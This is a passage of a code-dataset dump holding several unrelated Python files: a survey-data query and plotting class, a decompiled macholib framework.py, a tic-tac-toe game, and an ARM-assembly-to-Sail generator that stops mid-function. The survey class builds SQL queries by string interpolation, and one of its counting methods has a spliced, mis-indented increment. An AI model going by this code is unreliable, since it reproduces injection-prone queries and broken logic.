\"\"\"Selects one of two functions to create a dictionary \n of the query results\"\"\"\n if self.secondary == \"\":\n return self.getDictionaryOneVariable()\n else:\n return self.getDictionaryTwoVariables()\n \n def getDictionaryOneVariable(self):\n \"\"\"Returns a dictionary where each key corresponds to survey \n results, and each value is the number of times that response\n was in the queried set\"\"\"\n responses = self.query()\n dict = {}\n for response in responses:\n #response = response[0]\n dict.setdefault(response, \"dummy value\")\n if dict[response] == \"dummy value\":\n dict[response] = 1\n else:\n dict[response] = dict[response] + 1\n return dict\n \n def getDictionaryTwoVariables(self):\n \"\"\"Returns a dictionary where each key corresponds to survey results, \n and each value is the number of times that combination of responses\n was in the queried set\"\"\"\n responses = self.query()\n dict = {}\n for response in responses:\n dict.setdefault(response, \"dummy value\")\n if dict[response] == \"dummy value\":\n dict[response] = 1\n else:\n 
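# combination seen before: increment its count\n                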
\n            dict[response] = dict.get(response, 0) + 1\n        return dict\n\n    def initializeCursor(self):\n        \"\"\"Opens a connection to the database\"\"\"\n        self.cursor = self.connection.cursor()\n\n    def query(self):\n        \"\"\"Returns a list of tuples containing the query results\"\"\"\n        self.executeQuery()\n        return self.cursor.fetchall()\n\n    def executeQuery(self):\n        \"\"\"Executes a query using the instance variables for primary, secondary\"\"\"\n        if self.control2 != \"\":\n            self.queryTwoVariablesTwoControls()\n        elif self.control1 != \"\":\n            self.queryTwoVariablesOneControl()\n        elif self.secondary != \"\":\n            self.queryTwoVariables()\n        else:\n            self.queryOneVariable()\n\n    def getOrderedVariables(self, varName, responses):\n        \"\"\"Takes a variable as input and the dictionary of results in order\n        to return a list of the responses in the order they should be\n        displayed\"\"\"\n        varNP = np.load(\"orders.npy\")\n        variableOrdersDict = varNP.item()\n        varList = variableOrdersDict[varName]\n        vars = []\n        if varName == self.primary:\n            dataType = self.dataTypePrimary\n        else:\n            dataType = self.dataTypeSecondary\n        if dataType == 'categorical':\n            for x in varList:\n                temp = x[1]\n                temp = temp.replace('\"', '')\n                vars.append(temp)\n            return self.removeExtraVariables(vars, responses)\n        else:\n            return self.getVarKeys(varName, responses)\n\n    def getVarKeys(self, varName, dict):\n        \"\"\"For a continuous variable, return a list of all of the\n        responses that correspond to that variable from the results\"\"\"\n        orderedValues, continuousValues, categoricalValues = [], [], []\n        keys = dict.keys()\n        if varName == self.primary:\n            values = [key[0] for key in keys]\n        else:\n            values = [key[1] for key in keys]\n        for value in values:\n            try:\n                int(value)\n                continuousValues.append(value)\n            except ValueError:\n                categoricalValues.append(value)\n        continuousValues.sort(key=int)\n        for value in continuousValues:\n            if value not in orderedValues:\n                orderedValues.append(value)\n        for value in categoricalValues:\n            if value not in orderedValues:\n                orderedValues.append(value)\n        return orderedValues\n\n    def getDataType(self, varName, dict):\n        \"\"\"Tests whether or not a variable is continuous (AGE) or\n        categorical (SEX). 
This is important when we choose different\n graph types based on this distinction\"\"\"\n vars = []\n keys = sorted(dict.keys())\n if varName == self.primary:\n for k in keys:\n vars.append(k[0])\n elif varName == self.secondary:\n for k in keys:\n vars.append(k[1])\n elif varName == self.control1:\n for k in keys:\n vars.append(k[2])\n else:\n for k in keys:\n vars.append(k[3])\n for key in vars:\n if not key[0].isdigit():\n return \"categorical\"\n return \"continuous\"\n \n def fetchCountOneVariable(self, dict, row):\n \"\"\" Gets the count of the number of times a single variable shows\n up in the results\"\"\"\n listOfKeys = dict.keys()\n x = 0\n for key in listOfKeys:\n if row in key:\n x += dict[key]\n return x\n \n def fetchCountTwoVariables(self, dict, row, column):\n \"\"\"Gets the count of the number of times a combination of two\n responses occurs in our query\"\"\"\n listOfKeys = dict.keys()\n x = 0\n for key in listOfKeys:\n if row in key and column in key:\n x += dict[key]\n return x\n \n def isInKeys(self, dict, s):\n \"\"\"Tests if s occurs as a key in our dataset\"\"\"\n keys = dict.keys()\n for key in keys:\n if s in key:\n return True\n return False\n \n def removeExtraVariables(self, l, dict):\n \"\"\"Some variable queries have variables we don't want to crosstab\n We remove names from badnames from the list of variables we want to \n graph\"\"\"\n newList = []\n badNames = [\"IAP\", \"UNCODEABLE & IAP\", \"UNCODEABLE\"]\n for x in l:\n if self.isInKeys(dict, x) and x not in badNames:\n newList.append(x)\n return newList\n \n def queryOneVariable(self):\n \"\"\"Executes a query with the primary variable\"\"\"\n query = \"SELECT %s FROM gssdata WHERE %s IS NOT NULL;\" \n query = query % (self.primary, self.primary)\n self.cursor.execute(query)\n \n def queryTwoVariables(self):\n \"\"\"Executes a query with the primary and secondary variable\"\"\"\n query = \"SELECT %s, %s FROM gssdata WHERE %s IS NOT NULL AND %s IS NOT NULL\"\n query = query % (self.primary, self.secondary, self.primary, self.secondary)\n self.cursor.execute(query)\n \n def queryTwoVariablesOneControl(self):\n \"\"\"Executes a query with the primary variable, secondary variable, and \n one control variable\"\"\"\n query = \"SELECT %s, %s, %s FROM gssdata WHERE %s\"\n query +=\" IS NOT NULL AND %s IS NOT NULL AND %s IS NOT NULL;\"\n query = query % (self.primary, self.secondary, self.control1,\n self.primary, self.secondary, self.control1)\n self.cursor.execute(query)\n \n def queryTwoVariablesTwoControls(self):\n query = \"SELECT %s, %s, %s, %s FROM gssdata WHERE %s\"\n query +=\" IS NOT NULL AND %s IS NOT NULL AND %s IS NOT NULL AND\" \n query +=\" %s IS NOT NULL;\"\n query = query % (self.primary, self.secondary, self.control1, self.control2,\n self.primary, self.secondary, self.control1, self.control2)\n self.cursor.execute(query)\n \n ### GRAPHING ###\n \n def getHeatMap(self, theDataFrame):\n \"\"\"Creates a heatmap for two categorical variable queries.\"\"\"\n f, ax = plt.subplots(figsize=(12, 6))\n self.theDataFrame = self.categoricalArrayToDataFrame(self.percentageArray)\n xDescription = self.descriptionDict[self.secondary]\n yDescription = self.descriptionDict[self.primary]\n if self.dataTypePrimary == self.dataTypeSecondary == \"categorical\":\n plot = sns.heatmap(self.theDataFrame, annot=True, fmt=\".01%\", \n linewidths=0.5, ax=ax, cmap=\"Blues\")\n else:\n plot = sns.heatmap(self.theDataFrame, annot=False, \n linewidths=0.5, ax=ax, cmap=\"Blues\")\n ax.set(xlabel=xDescription, 
ylabel=yDescription)\n picture = plot.get_figure()\n picture.savefig(\"static/\" + self.primary + \"-\" + \n self.secondary + \".png\", bbox_inches = \"tight\")\n return\n\n def getBarPlot(self, array):\n \"\"\"Creates a bar plot for single categorical variable queries.\"\"\"\n # NOTE: sns.barplot() does not yet seem to play well with pandas series\n # For that reason, this is temporarily using default arrays\n f, ax = plt.subplots(figsize=(12, 6))\n ax = sns.barplot(array[0], array[1])\n description = self.descriptionDict[self.primary]\n ax.set(xlabel=description, ylabel = \"count\")\n # Rotate labels\n for tick in ax.get_xticklabels():\n tick.set_rotation(90)\n # Add margin to bottom\n f.subplots_adjust(bottom=0.2)\n picture = ax.get_figure()\n picture.savefig(\"static/\" + self.primary + \".png\", bbox_inches = \"tight\") \n\n\n def continuousArrayToSeries(self, array):\n \"\"\"Converts a 2-element list of lists (i.e. for a single variable\n query) to a 1D pandas Series, where the data is continuous.\"\"\"\n name = self.primary\n values = []\n # For each possible value (i.e. element of first array), add the\n # corresponding number of that value (i.e. element of second array)\n # to the overall series (ignores categorical responses to query)\n for i in range(len(array[0])):\n try:\n for j in range(int(array[1][i])):\n values.append(int(array[0][i]))\n except:\n # array[0][i] was not an int; skip this value\n continue\n theSeries = pd.Series(data = values, index = values, name = name)\n return theSeries\n \n def categoricalArrayToDataFrame(self, array):\n \"\"\"Converts a 2D array (list of lists) of categorical objects\n to a 2D pandas DataFrame.\"\"\"\n # By convention in the rest of the code, the first row is the primary\n # labels, the first column is the secondary labels, and the rest is the\n # count of responses with each pair of values\n data = [row[1:] for row in array[1:]]\n rowHeaders = [row[0] for row in array[1:]]\n columnHeaders = array[0][1:]\n name = self.primary\n theDataFrame = pd.DataFrame(data = data,\n index = rowHeaders,\n columns = columnHeaders,)\n return theDataFrame\n \n \nif __name__ == \"__main__\":\n main()","sub_path":"datasource.py","file_name":"datasource.py","file_ext":"py","file_size_in_byte":16829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"578622574","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.0 (v3.6.0:41df79263a11, Dec 23 2016, 08:06:12) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: ctypes\\macholib\\framework.py\n\"\"\"\nGeneric framework path manipulation\n\"\"\"\nimport re\n__all__ = [\n 'framework_info']\nSTRICT_FRAMEWORK_RE = re.compile('(?x)\\n(?P<location>^.*)(?:^|/)\\n(?P<name>\\n (?P<shortname>\\\\w+).framework/\\n (?:Versions/(?P<version>[^/]+)/)?\\n (?P=shortname)\\n (?:_(?P<suffix>[^_]+))?\\n)$\\n')\n\ndef framework_info(filename):\n \"\"\"\n A framework name can take one of the following four forms:\n Location/Name.framework/Versions/SomeVersion/Name_Suffix\n Location/Name.framework/Versions/SomeVersion/Name\n Location/Name.framework/Name_Suffix\n Location/Name.framework/Name\n\n returns None if not found, or a mapping equivalent to:\n dict(\n location='Location',\n name='Name.framework/Versions/SomeVersion/Name_Suffix',\n shortname='Name',\n version='SomeVersion',\n suffix='Suffix',\n )\n\n Note that SomeVersion and Suffix are optional and may be None\n if not present\n \"\"\"\n is_framework = 
STRICT_FRAMEWORK_RE.match(filename)\n if not is_framework:\n return\n else:\n return is_framework.groupdict()\n\n\ndef test_framework_info():\n\n def d(location=None, name=None, shortname=None, version=None, suffix=None):\n return dict(location=location,\n name=name,\n shortname=shortname,\n version=version,\n suffix=suffix)\n\n if not framework_info('completely/invalid') is None:\n raise AssertionError\n else:\n if not framework_info('completely/invalid/_debug') is None:\n raise AssertionError\n else:\n if not framework_info('P/F.framework') is None:\n raise AssertionError\n else:\n if not framework_info('P/F.framework/_debug') is None:\n raise AssertionError\n else:\n if not framework_info('P/F.framework/F') == d('P', 'F.framework/F', 'F'):\n raise AssertionError\n elif not framework_info('P/F.framework/F_debug') == d('P', 'F.framework/F_debug', 'F', suffix='debug'):\n raise AssertionError\n assert framework_info('P/F.framework/Versions') is None\n assert framework_info('P/F.framework/Versions/A') is None\n assert framework_info('P/F.framework/Versions/A/F') == d('P', 'F.framework/Versions/A/F', 'F', 'A')\n assert framework_info('P/F.framework/Versions/A/F_debug') == d('P', 'F.framework/Versions/A/F_debug', 'F', 'A', 'debug')\n\n\nif __name__ == '__main__':\n test_framework_info()","sub_path":"PYZ-00.pyz/ctypes/macholib/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427413746","text":"def DisplayBoard(l):\n print(' | | ')\n print(' {} | {} | {} '.format(l[0],l[1],l[2]))\n print('---------------------')\n print(' | | ')\n print(' {} | {} | {} '.format(l[3],l[4],l[5]))\n print('---------------------')\n print(' | | ')\n print(' {} | {} | {} '.format(l[6],l[7],l[8]))\n\ndef PlayerInput(player1):\n player1 = input(\"Please pick a marker 'X' or 'O'\")\n while player1 not in 'XO':\n print('Invalid input')\n player1 = input(\"Please pick a marker 'X' or 'O'\")\n return player1\n\ndef Place_Marker(pl,c,pos):\n pl[pos] = c\n\n\ndef win_check(pl,c):\n if(pl[0] == c and pl[1] == c and pl[2] == c):\n return True\n elif (pl[3] == c and pl[4] == c and pl[5] == c):\n return True\n elif (pl[6] == c and pl[7] == c and pl[8] == c):\n return True\n elif (pl[0] == c and pl[4] == c and pl[8] == c):\n return True\n elif (pl[2] == c and pl[4] == c and pl[6] == c):\n return True\n elif (pl[0] == c and pl[3] == c and pl[6] == c):\n return True\n elif (pl[1] == c and pl[4] == c and pl[7] == c):\n return True\n elif (pl[2] == c and pl[5] == c and pl[8] == c):\n return True\n else:\n return False\n\n\n\ndef space_check(board, position):\n if board[position] == '#':\n game_on = False\n return True\n else:\n return False\n\ndef full_board_check(board):\n if '#' in board:\n return False\n else:\n return True\n\ndef player_choice(board):\n pos = int(input('enter the next position'))\n while pos == '#':\n pos = int(input('enter valid next position'))\n return pos\n\ndef replay():\n inp = input('do you want to play or not yes/no')\n return inp\n\n\n\nprint(\"welcome to tictactoe\")\n\n\nwhile True:\n l = ['#', '#', '#', '#', '#', '#', '#', '#', '#']\n player1 = PlayerInput('')\n player2 = ''\n if player1 == 'X':\n player2 = 'O'\n else:\n player2 = 'X'\n game_on = True\n winner = 'notyet'\n while game_on :\n print('this is player1 turn')\n pos = player_choice(l)\n while not space_check(l,pos):\n print('already filled')\n pos = player_choice(l)\n Place_Marker(l, 'X', pos)\n 
DisplayBoard(l)\n\n if win_check(l,'X'):\n print('player1 has won')\n gameOver = True\n break\n if full_board_check(l) and winner == 'notyet':\n print('match Drawn')\n\n\n print('this is player2 turn')\n pos = player_choice(l)\n while not space_check(l, pos):\n print('already filled')\n pos = player_choice(l)\n Place_Marker(l, 'O', pos)\n DisplayBoard(l)\n\n if win_check(l, 'O'):\n print('player2 has won')\n gameOver = True\n break\n if full_board_check(l) and winner == 'notyet':\n print('match Drawn')\n\n\n\n playAgain = replay()\n if playAgain == 'yes':\n continue\n else :\n break\n\n\n\n \n","sub_path":"Tictactoe.py","file_name":"Tictactoe.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"430770244","text":"import copy\nimport itertools\nimport math\nimport re\nimport string\nimport xml.etree.cElementTree as ET\nimport pyleri\nfrom pyleri import Grammar, Regex, Choice, Sequence, Token, Keyword, Repeat, Ref\nfrom pyleri.node import Node\n\nimport explanations\nfrom explanations import sanitize, asl_bitexpr_to_sail, bitlit_re, Explanation\n\ndef expand_dontcares(s):\n if len(s) == 0:\n return []\n elif len(s) == 1:\n if s in 'xX':\n return ['0', '1']\n elif s in '10':\n return s\n else:\n assert False, 'expand_dontcares() saw non-1|0|x'\n elif s[0] in 'xX':\n rest = expand_dontcares(s[1:])\n return (['0' + r for r in rest] +\n ['1' + r for r in rest])\n elif s[0] in '10':\n return [s[0] + r for r in expand_dontcares(s[1:])]\n else:\n assert False, 'expand_dontcares() saw non-1|0|x'\n\ndef name_or_const(guards, hi, lo, nm, split, consts, actual_consts):\n if nm in guards and 'x' not in guards[nm]:\n return '0b{}'.format(guards[nm], nm)\n elif actual_consts != 'x' * (hi - lo + 1) and '!=' not in actual_consts:\n return '0b{}'.format(actual_consts.replace('(', '').replace(')', ''), nm) # unpred\n else:\n return nm\n\nguard_re = re.compile(r'([A-Za-z0-9]+) == \\(?([01x]+)\\)?')\nneg_guard_re = re.compile(r'([A-Za-z0-9]+) != \\(?([01x]+)\\)?')\n\n\ndef parse_guards(s):\n if s is None:\n return ({}, {})\n pos = {}\n neg = {}\n guards = s.split(' && ')\n for g in guards:\n m = guard_re.match(g)\n if m:\n pos[m.group(1)] = m.group(2)\n else:\n m = neg_guard_re.match(g)\n if m:\n neg[m.group(1)] = m.group(2)\n else:\n assert False\n return (pos, neg)\n\ndef emit_sail_asm(file, enc):\n enc_name, enc_iset, enc_fields, enc_asl, enc_asms = enc\n for (gs, rhs) in enc_asms:\n pos_guards, neg_guards = parse_guards(gs)\n fields = [name_or_const(pos_guards, *f) for f in enc_fields if f[2] != '_']\n lhs = '{}({})'.format(sanitize(enc_name), ', '.join(fields))\n\n pos_guards = {k: expand_dontcares(v) for k, v in pos_guards.items()}\n neg_guards = {k: expand_dontcares(v) for k, v in neg_guards.items()}\n pos_sail_guards = ' & '.join(['(' + ' | '.join('{} == 0b{}'.format(k, v) for v in vs) + ')' for k, vs in pos_guards.items()])\n neg_sail_guards = ' & '.join(['(' + ' & '.join('{} != 0b{}'.format(k, v) for v in vs) + ')' for k, vs in neg_guards.items()])\n\n clause = 'mapping clause assembly = {}{}{} <-> {}'.format(lhs,\n ' if ' if neg_sail_guards else '',\n neg_sail_guards,\n rhs.replace(':', '@'))\n print(clause, file=file)\n\nclass ASMTemplateGrammar(Grammar):\n doublespace = Regex('\\s\\s+')\n space = Regex('\\s')\n link = Regex('<[A-Za-z0-9_|()+]+>')\n text = Regex('[A-Za-z0-9_[\\]!,#.]+')\n optional = Ref()\n optional = Sequence('{', Repeat(Choice(link, text, optional, space), mi=1), '}')\n 
bracket_alternative = Sequence('(', Repeat(Choice(link, text, space), mi=1), '|', Repeat(Choice(link, text, space), mi=1), ')')\n# unbracket_alternative = Sequence(Choice(link, text), mi=1), '|', Repeat(Choice(link, text), mi=1))\n optional_alternative = Sequence('{', Repeat(Choice(link, text, space), mi=1), '|', Repeat(Choice(link, text, space), mi=1), '}')\n START = Repeat(Choice(doublespace, space, link, text, optional_alternative, bracket_alternative, optional), mi=1)\n\n def _walk(self, element, pos, tree, rule, is_required):\n if self._pos != pos:\n self._s = self._string[pos:] #.lstrip() # don't strip whitespace\n self._pos = self._len_string - len(self._s)\n node = Node(element, self._string, self._pos)\n self._expecting.set_mode_required(node.start, is_required)\n return element._get_node_result(self, tree, rule, self._s, node)\n\nasm_grammar = ASMTemplateGrammar()\n\nclass BitConcatsGrammar(Grammar):\n START = Ref()\n arg = Regex('[A-Za-z][A-Za-z0-9]*')\n brackets = Sequence('(', START, ')')\n literal = Regex('0b[01]+')\n concat = pyleri.List(Choice(brackets, arg, literal), delimiter='@')\n START = Choice(brackets, arg, literal, concat)\n\nbit_concats_grammar = BitConcatsGrammar()\n\ndef fst_by_snd(pairs, target):\n for fst, snd in pairs:\n if target == snd:\n return fst\n raise KeyError(target)\n\ndef process_bitconcat_node_get_bits(types, node):\n assert hasattr(node.element, 'name')\n if node.element.name == 'START':\n return process_bitconcat_node_get_bits(types, node.children[0])\n elif node.element.name == 'literal':\n return len(node.string) - 2 # remove the '0b'\n elif node.element.name == 'brackets':\n return process_bitconcat_node_get_bits(types, node.children[1])\n elif node.element.name == 'arg':\n return bits_type_to_n(types[node.string])\n elif node.element.name == 'concat':\n return sum(process_bitconcat_node_get_bits(types, n.children[0]) for n in node.children if str(n.element) != '@')\n else:\n assert False, 'unknown element type in process_bitconcat_node_get_bits'\n\ndef get_bitconcat_n_bits(types, bc):\n parse = bit_concats_grammar.parse(bc)\n assert parse.is_valid\n start = parse.tree.children[0] if parse.tree.children else parse.tree # pyleri bug workaround?\n return process_bitconcat_node_get_bits(types, start)\n\ndef process_bitconcat_node_typing(types, node):\n assert hasattr(node.element, 'name')\n if node.element.name == 'START':\n return process_bitconcat_node_typing(types, node.children[0])\n elif node.element.name == 'literal':\n return '{}'.format(node.string, len(node.string) - 2) # (remove 0b) Type annotating this shouldn't be necessary but sail bug\n elif node.element.name == 'brackets':\n return '({})'.format(process_bitconcat_node_typing(types, node.children[1]))\n elif node.element.name == 'arg':\n return '({}:{})'.format(node.string, types[node.string])\n elif node.element.name == 'concat':\n return '@'.join(process_bitconcat_node_typing(types, n.children[0]) for n in node.children if str(n.element) != '@')\n else:\n assert False, 'unknown element type in process_bitconcat_node_typing'\n\ndef type_bitconcat(types, bc):\n parse = bit_concats_grammar.parse(bc)\n assert parse.is_valid\n start = parse.tree.children[0] if parse.tree.children else parse.tree # pyleri bug workaround?\n return process_bitconcat_node_typing(types, start)\n\nclass NoDefaultException(Exception): pass\n\ndef default_clause(explanations, types, arg, link):\n exp = explanations[link]\n try:\n default = exp.props['default']\n except KeyError as e:\n if 
link.startswith('<extend>') and link.endswith('_32_addsub_ext') or link.endswith('_32S_addsub_ext'):\n default = 'UXTW'\n elif link.startswith('<extend>') and link.endswith('_64_addsub_ext') or link.endswith('_64S_addsub_ext'):\n default = 'UXTX'\n elif exp.type == 'asm_constant' and 'expr' in exp.props and exp.props['expr'] == 'PRESENCE':\n default = '0'\n else:\n raise NoDefaultException() from e\n m = bitlit_re.match(default)\n if m:\n return asl_bitexpr_to_sail(default)\n elif ' ' in default:\n assert exp.type == 'TABLE'\n return '{}'.format(asl_bitexpr_to_sail(fst_by_snd(exp.values, default)))\n elif default.isdigit():\n return '0b{:0{}b}'.format(int(default), get_bitconcat_n_bits(types, arg))\n elif default.isalnum():\n assert exp.type == 'TABLE'\n return '{}'.format(asl_bitexpr_to_sail(fst_by_snd(exp.values, '\"' + default + '\"')))\n else:\n assert False, \"default_clause doesn't know how to handle {!r} for {!r}\".format(default, link)\n\ndef generate_presence_explanation(instr_name, enc_name, explanations, types, el):\n link = el.string + '_' + enc_name\n el_exp = explanations[link]\n\n values = [\n ('0b0', '\"\" if false /* hack */'),\n ('0b1', '\"{}\"'.format(el_exp.props['constant'])),\n ('0b0', '\"\"'),\n ]\n props = {\n 'encoded_in': '({})'.format(', '.join(el_exp.props['encoded_in'])),\n 'arg_type': 'bits({})'.format(get_bitconcat_n_bits(types, el_exp.props['encoded_in'])),\n }\n name = '{}_presence_{}'.format(enc_name, sanitize(el_exp.props['encoded_in']))\n assert name not in explanations\n explanations[name] = Explanation('TABLE', props, values)\n return (name, [el_exp.props['encoded_in']], [link])\n\ndef generate_optional_explanation(instr_name, enc_name, explanations, types, children):\n els_args = [process_element(instr_name, enc_name, explanations, types, child.children[0]) for child in children[1].children]\n elements = list(itertools.chain.from_iterable([el_arg[0] for el_arg in els_args])) # flatten\n args = list(itertools.chain.from_iterable([el_arg[1] for el_arg in els_args])) # flatten\n links = list(itertools.chain.from_iterable([el_arg[2] for el_arg in els_args])) # flatten\n\n values = [\n ('({})'.format(', '.join(default_clause(explanations, types, arg, link) for arg, link in zip(args, links))), '\"\" if false /* hack */'),\n ('({})'.format(', '.join(type_bitconcat(types, arg) for arg in args)), ' ^ '.join(elements)),\n ('({})'.format(', '.join(default_clause(explanations, types, arg, link) for arg, link in zip(args, links))), '\"\"'),\n ]\n props = {\n 'encoded_in': '({})'.format(', '.join(args)),\n 'arg_type': '({})'.format(', '.join('bits({})'.format(get_bitconcat_n_bits(types, arg)) for arg in args)) if len(args) > 0 else 'unit',\n }\n name = '{}_optional_{}'.format(enc_name, sanitize('_'.join(args)))\n assert name not in explanations\n explanations[name] = Explanation('TABLE', props, values)\n return (name, args, links)\n\ndef generate_alternative_explanation(instr_name, enc_name, explanations, types, children1, children2):\n els_args1 = [process_element(instr_name, enc_name, explanations, types, child.children[0]) for child in children1]\n elements1 = list(itertools.chain.from_iterable([el_arg[0] for el_arg in els_args1])) # flatten\n args1 = list(itertools.chain.from_iterable([el_arg[1] for el_arg in els_args1])) # flatten\n links1 = list(itertools.chain.from_iterable([el_arg[2] for el_arg in els_args1])) # flatten\n\n els_args2 = [process_element(instr_name, enc_name, explanations, types, child.children[0]) for child in children2]\n elements2 = 
list(itertools.chain.from_iterable([el_arg[0] for el_arg in els_args2])) # flatten\n args2 = list(itertools.chain.from_iterable([el_arg[1] for el_arg in els_args2])) # flatten\n links2 = list(itertools.chain.from_iterable([el_arg[2] for el_arg in els_args2])) # flatten\n\n if args1[0].split('@') == args2:\n args1 = args2\n elif args1 == args2[0].split('@'):\n args2 = args1\n\n assert args1 == args2\n # what to do about links? they're almost certainly different\n\n values = [\n ('({})'.format(', '.join(type_bitconcat(types, arg) for arg in args1)), ' ^ '.join(elements1)),\n ('({})'.format(', '.join(type_bitconcat(types, arg) for arg in args2)), ' ^ '.join(elements2)),\n ]\n props = {\n 'encoded_in': '({})'.format(', '.join(args1)),\n 'arg_type': '({})'.format(', '.join('bits({})'.format(get_bitconcat_n_bits(types, arg)) for arg in args1)),\n }\n name = '{}_alternative_{}'.format(enc_name, sanitize('_'.join(args1)))\n assert name not in explanations\n explanations[name] = Explanation('TABLE', props, values)\n return (name, args1, links1)\n\ndef generate_optional_alternative_explanation(instr_name, enc_name, explanations, types, children1, children2):\n els_args1 = [process_element(instr_name, enc_name, explanations, types, child.children[0]) for child in children1]\n elements1 = list(itertools.chain.from_iterable([el_arg[0] for el_arg in els_args1])) # flatten\n args1 = list(itertools.chain.from_iterable([el_arg[1] for el_arg in els_args1])) # flatten\n links1 = list(itertools.chain.from_iterable([el_arg[2] for el_arg in els_args1])) # flatten\n\n els_args2 = [process_element(instr_name, enc_name, explanations, types, child.children[0]) for child in children2]\n elements2 = list(itertools.chain.from_iterable([el_arg[0] for el_arg in els_args2])) # flatten\n args2 = list(itertools.chain.from_iterable([el_arg[1] for el_arg in els_args2])) # flatten\n links2 = list(itertools.chain.from_iterable([el_arg[2] for el_arg in els_args2])) # flatten\n\n alt_name, alt_args, alt_links = generate_alternative_explanation(instr_name, enc_name, explanations, types, children1, children2)\n\n assert args1 == args2 == alt_args\n # what to do about links? 
they're almost certainly different\n\n # see if either side has a default\n try:\n default_args = [default_clause(explanations, types, arg, link) for arg, link in zip(args1, links1)]\n values = [\n ('({})'.format(', '.join(default_args)), '\"\" if false /* hack */'),\n ('({})'.format(', '.join(type_bitconcat(types, arg) for arg in args1)), '{}({})'.format(alt_name, ', '.join(args1))),\n ('({})'.format(', '.join(default_args)), '\"\"'),\n ]\n props = {\n 'encoded_in': '({})'.format(', '.join(args1)),\n 'arg_type': '({})'.format(', '.join('bits({})'.format(get_bitconcat_n_bits(types, arg)) for arg in args1)),\n }\n except NoDefaultException:\n default_args = [default_clause(explanations, types, arg, link) for arg, link in zip(args2, links2)]\n values = [\n ('({})'.format(', '.join(default_args)), '\"\" if false /* hack */'),\n ('({})'.format(', '.join(type_bitconcat(types, arg) for arg in args2)), '{}({})'.format(alt_name, ', '.join(args2))),\n ('({})'.format(', '.join(default_args)), '\"\"'),\n ]\n props = {\n 'encoded_in': '({})'.format(', '.join(args2)),\n 'arg_type': '({})'.format(', '.join('bits({})'.format(get_bitconcat_n_bits(types, arg)) for arg in args2)),\n }\n name = '{}_optional_{}'.format(enc_name, sanitize('_'.join(args1)))\n assert name not in explanations\n explanations[name] = Explanation('TABLE', props, values)\n return (name, args1, links1)\n\ndef bits_type_to_n(t):\n assert t.startswith('bits(')\n assert t.endswith(')')\n return int(t[5:-1])\n\n# returns (list of sail string, list of arguments for optional, list of links for optional)\ndef process_element(instr_name, enc_name, explanations, types, el):\n if type(el.element) is Token and str(el.element) in '{}()':\n return ([], [])\n elif el.element.name == 'text':\n els = ['\"{}\"'.format(el.string)]\n return (els, [], [])\n elif el.element.name == 'doublespace':\n return (['spc()'], [], [])\n elif el.element.name == 'space':\n return (['def_spc()'], [], [])\n elif el.element.name == 'link':\n link = el.string + '_' + enc_name\n exp = explanations[link]\n if (exp.type == 'asm_immediate' or exp.type == 'asm_signed_immediate'):\n n_bits = get_bitconcat_n_bits(types, exp.props['encoded_in'])\n return (['hex_bits_{}({})'.format(n_bits, exp.props['encoded_in'])], [exp.props['encoded_in']], [link])\n # TODO FIXME SIGNED\n # elif exp.type == 'asm_signed_immediate':\n # n_bits = get_bitconcat_n_bits(types, exp.props['encoded_in'])\n # return (['hex_bits_{}({})'.format(n_bits, exp.props['enc\n elif exp.type == 'asm_extendedreg_hack_oneSP_64':\n return (['asm_extendedreg_hack_oneSP_64(Rn, option, Rm, imm3)'], ['Rn', 'option', 'Rm', 'imm3'], [link])\n elif exp.type == 'asm_extendedreg_hack_twoSP_64':\n return (['asm_extendedreg_hack_twoSP_64(Rd, Rn, option, Rm, imm3)'], ['Rd', 'Rn', 'option', 'Rm', 'imm3'], [link])\n elif exp.type == 'asm_extendedreg_hack_oneSP_32':\n return (['asm_extendedreg_hack_oneSP_32(Rn, option, Rm, imm3)'], ['Rn', 'option', 'Rm', 'imm3'], [link])\n elif exp.type == 'asm_extendedreg_hack_twoSP_32':\n return (['asm_extendedreg_hack_twoSP_32(Rd, Rn, option, Rm, imm3)'], ['Rd', 'Rn', 'option', 'Rm', 'imm3'], [link])\n elif exp.type == 'lsl_shift_hack_32':\n return (['lsl_shift_hack_32(immr, imms)'], ['immr', 'imms'], [link])\n elif exp.type == 'lsl_shift_hack_64':\n return (['lsl_shift_hack_64(immr, imms)'], ['immr', 'imms'], [link])\n# elif exp.type == 'lsb_width_hack_32':\n# return (['lsb_width_hack_32(immr, imms)'], ['immr', 'imms'], [link])\n elif exp.type == 'lsb_width_hack':\n return 
(['lsb_width_hack(immr, imms)'], ['immr', 'imms'], [link])\n elif exp.type == 'lsb_mod_hack_32':\n return (['lsb_mod_hack_32(immr, imms)'], ['immr', 'imms'], [link])\n elif exp.type == 'lsb_mod_hack_64':\n return (['lsb_mod_hack_64(immr, imms)'], ['immr', 'imms'], [link])\n elif exp.type == 'matching_Wn':\n return (['matching_Wn(Rn, Rm)'], ['Rn', 'Rm'], [link])\n elif exp.type == 'matching_Xn':\n return (['matching_Xn(Rn, Rm)'], ['Rn', 'Rm'], [link])\n elif exp.type == 'movewide_imm_hack_32':\n return (['movewide_imm_hack_32(imm16, hw)'], ['imm16', 'hw'], [link])\n elif exp.type == 'movewide_imm_hack_64':\n return (['movewide_imm_hack_64(imm16, hw)'], ['imm16', 'hw'], [link])\n elif exp.type == 'movewide_inverted_imm_hack_32':\n return (['movewide_inverted_imm_hack_32(imm16, hw)'], ['imm16', 'hw'], [link])\n elif exp.type == 'movewide_inverted_imm_hack_64':\n return (['movewide_inverted_imm_hack_64(imm16, hw)'], ['imm16', 'hw'], [link])\n elif 'expr' in exp.props and exp.type == 'asm_constant' and exp.props['expr'] == 'PRESENCE':\n name, args, links = generate_presence_explanation(instr_name, enc_name, explanations, types, el)\n return (['{}({})'.format(name, ', '.join(args))], args, links)\n elif exp.type == 'TABLE':\n return (['{}({})'.format(sanitize(link), exp.props['encoded_in'])], [exp.props['encoded_in']], [link])\n else:\n return (['{}({})'.format(exp.type, exp.props['encoded_in'])], [exp.props['encoded_in']], [link])\n elif el.element.name == 'bracket_alternative':\n name, args, links = generate_alternative_explanation(instr_name, enc_name, explanations, types, el.children[1].children, el.children[3].children)\n return (['{}({})'.format(name, ', '.join(args))], args, links)\n elif el.element.name == 'optional_alternative':\n name, args, links = 